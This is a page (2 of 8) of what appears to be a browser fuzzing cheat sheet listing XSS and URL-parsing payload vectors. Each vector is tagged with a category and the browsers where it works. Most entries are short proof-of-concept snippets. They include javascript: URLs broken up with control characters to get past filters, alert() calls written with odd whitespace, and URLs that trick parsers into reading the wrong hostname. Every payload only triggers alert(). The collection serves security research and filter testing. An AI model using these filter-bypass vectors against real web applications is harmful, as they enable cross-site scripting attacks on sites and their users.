Cheat Sheet

Generated payloads from fuzz test results. Filter by type, category, or browser.

Found 153 vectors with results

const s = String.fromCodePoint(i);0x0D
if (escape(s).includes("%")) alert(i);
JSJavaScript SyntaxChromeFirefoxSafari
const s = String.fromCodePoint(i);0x0D
if (encodeURI(s).includes("%")) alert(i);
JSJavaScript SyntaxChromeFirefoxSafari
const s = String.fromCodePoint(i);0x0D
if (encodeURIComponent(s).includes("%")) alert(i);
JSJavaScript SyntaxChromeFirefoxSafari
try{0x0D
img = document.createElement("img");0x0D
img.src=`https://example.com:1@1`;0x0D
url = new URL(img.src);0x0D
if(url.hostname != "example.com"){0x0D
  alert(64);0x0D
}0x0D
} catch{}
JSURL HandlingChromeFirefoxSafari
if (new URL("https://google.com:10x090x09/endpoint").hostname!="google.com"){alert(9)}
JSURL HandlingChrome
if (new URL("https://google.com:1##/endpoint").hostname!="google.com"){alert(35)}
JSURL HandlingChrome
if (new URL("https://google.com:1///endpoint").hostname!="google.com"){alert(47)}
JSURL HandlingChrome
if (new URL("https://google.com:100/endpoint").hostname!="google.com"){alert(48)}
JSURL HandlingChrome
if (new URL("https://google.com:111/endpoint").hostname!="google.com"){alert(49)}
JSURL HandlingChrome
try{0x0D
document.createElement(String.fromCodePoint(58));0x0D
alert(58)0x0D
} catch{}
JSXSS ExecutionChromeFirefoxSafariMicrosoft Edge
try{0x0D
document.createElement(String.fromCodePoint(95));0x0D
alert(95)0x0D
} catch{}
JSXSS ExecutionChromeFirefoxSafariMicrosoft Edge
try{0x0D
document.createElement(String.fromCodePoint(170));0x0D
alert(170)0x0D
} catch{}
JSXSS ExecutionChromeFirefoxSafariMicrosoft Edge
try{0x0D
document.createElement(String.fromCodePoint(186));0x0D
alert(186)0x0D
} catch{}
JSXSS ExecutionChromeFirefoxSafariMicrosoft Edge
<a href="https://0x09example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="https://
example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="https://0x0Dexample2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="https:///example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="https://@example2.com" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<script>"\\"-alert(92)//"</script>
XSSCharacter EncodingChromeFirefoxSafari
if(new URL("https" + String.fromCharCode(i) + "//example.com").host == "example.com") alert(i)
JSURL HandlingSafariChrome
anchor.href="https://psres.net"+String.fromCodePoint(35)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
    alert(35)0x0D
}
JSURL HandlingChromeFirefoxSafari
anchor.href="https://psres.net"+String.fromCodePoint(47)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
    alert(47)0x0D
}
JSURL HandlingChromeFirefoxSafari
anchor.href="https://psres.net"+String.fromCodePoint(63)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
    alert(63)0x0D
}
JSURL HandlingChromeFirefoxSafari
anchor.href="https://psres.net"+String.fromCodePoint(92)+"@example.com";0x0D
if(anchor.host !== 'example.com'){0x0D
    alert(92)0x0D
}
JSURL HandlingChromeFirefoxSafari
<a href="java0x09script:test.com/" id="test"></a>
XSSURL HandlingChromeFirefox
<a href="java
script:test.com/" id="test"></a>
XSSURL HandlingChromeFirefox
<a href="java0x0Dscript:test.com/" id="test"></a>
XSSURL HandlingChromeFirefox
<a href="0x01javascript:test.com/" id="test"></a>
XSSURL HandlingChrome
<a href="0x02javascript:test.com/" id="test"></a>
XSSURL HandlingChrome
<a href="0x03javascript:test.com/" id="test"></a>
XSSURL HandlingChrome
<a href="0x04javascript:test.com/" id="test"></a>
XSSURL HandlingChrome
<a href="0x05javascript:test.com/" id="test"></a>
XSSURL HandlingChrome
alert⟦09?.(9)
JSXSS ExecutionSafari
alert
?.(10)
JSXSS ExecutionSafari
alert0x0B?.(11)
JSXSS ExecutionSafari
alert0x0C?.(12)
JSXSS ExecutionSafari
alert0x0D?.(13)
JSXSS ExecutionSafari
void0x09alert(9)
JSXSS ExecutionSafari
void
alert(10)
JSXSS ExecutionSafari
void0x0Balert(11)
JSXSS ExecutionSafari
void0x0Calert(12)
JSXSS ExecutionSafari
void0x0Dalert(13)
JSXSS ExecutionSafari
alert?.0x09(9)
JSXSS ExecutionSafariChrome
alert?.
(10)
JSXSS ExecutionSafariChrome
alert?.0x0B(11)
JSXSS ExecutionSafariChrome
alert?.0x0C(12)
JSXSS ExecutionSafariChrome
alert?.0x0D(13)
JSXSS ExecutionSafariChrome
<style>0x0D
0x09div{color:red;}0D⟧
</style>0x0D
<div id=x>test</div>0x0D
XSSCSS ParsingChromeSafari
<style>0x0D

div{color:red;}0D⟧
</style>0x0D
<div id=x>test</div>0x0D
XSSCSS ParsingChromeSafari
<style>0x0D
0x0Cdiv{color:red;}0D⟧
</style>0x0D
<div id=x>test</div>0x0D
XSSCSS ParsingChromeSafari
<style>0x0D
0x0Ddiv{color:red;}0D⟧
</style>0x0D
<div id=x>test</div>0x0D
XSSCSS ParsingChromeSafari
<style>0x0D
 div{color:red;}0D⟧
</style>0x0D
<div id=x>test</div>0x0D
XSSCSS ParsingChromeSafari
var myVar = "foo"0x0D
alert(34)0x0D
// a";0x0D
JSJavaScript SyntaxChromeFirefoxSafari
<a href="0x01javascript:" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="0x02javascript:" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="0x03javascript:" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="0x04javascript:" id=x></a>
XSSURL HandlingChromeFirefoxSafari
<a href="0x05javascript:" id=x></a>
XSSURL HandlingChromeFirefoxSafari

Page 2 of 8